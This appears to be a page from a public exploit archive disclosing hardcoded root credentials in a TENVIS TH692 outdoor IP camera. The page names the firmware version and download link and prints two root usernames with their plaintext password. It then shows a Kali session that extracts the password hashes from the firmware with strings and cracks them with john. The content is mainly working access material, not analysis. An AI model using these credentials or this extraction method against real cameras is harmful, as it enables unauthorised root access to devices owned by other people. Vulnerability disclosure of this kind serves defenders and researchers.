29fc5c4082
5 new exploits Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit (x86-64) WordPress leenk.me Plugin 2.5.0 - CSRF/XSS WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials Novell ServiceDesk Authenticated File Upload pfSense Community Edition 2.2.6 - Multiple Vulnerabilities
39 lines
1.3 KiB
Text
Executable file
39 lines
1.3 KiB
Text
Executable file
Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials
|
|
Date: 4/16/2016
|
|
Exploit Author: DLY
|
|
Vendor: TENVIS Technology Co., Ltd
|
|
Product: TH692- Outdoor P2P HD Waterproof IP Camera
|
|
Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html
|
|
Affected version: TH692C-V. 16.1.16.1.1.4
|
|
firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov
|
|
|
|
user: Mroot
|
|
pass:cat1029
|
|
user:Wproot
|
|
pass: cat1029
|
|
|
|
root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root
|
|
rootpath
|
|
rootfs crc %lx
|
|
------------------start upgrade rootfs------------------
|
|
------------------end upgrade rootfs------------------
|
|
bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext)
|
|
nfsroot
|
|
7root
|
|
Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot
|
|
k01000100 rootbox nohelp info
|
|
root::0:
|
|
Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
|
|
Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh
|
|
nfsroot
|
|
pivot_root
|
|
xswitch_root
|
|
chroot
|
|
nfsroot
|
|
root@kali:~# john --show ipcamhashes
|
|
Mroot:cat1029:0:0::/root:/bin/sh
|
|
Wproot:cat1029:0:0::/root:/bin/sh
|
|
|
|
2 password hashes cracked, 0 left
|
|
|
|
|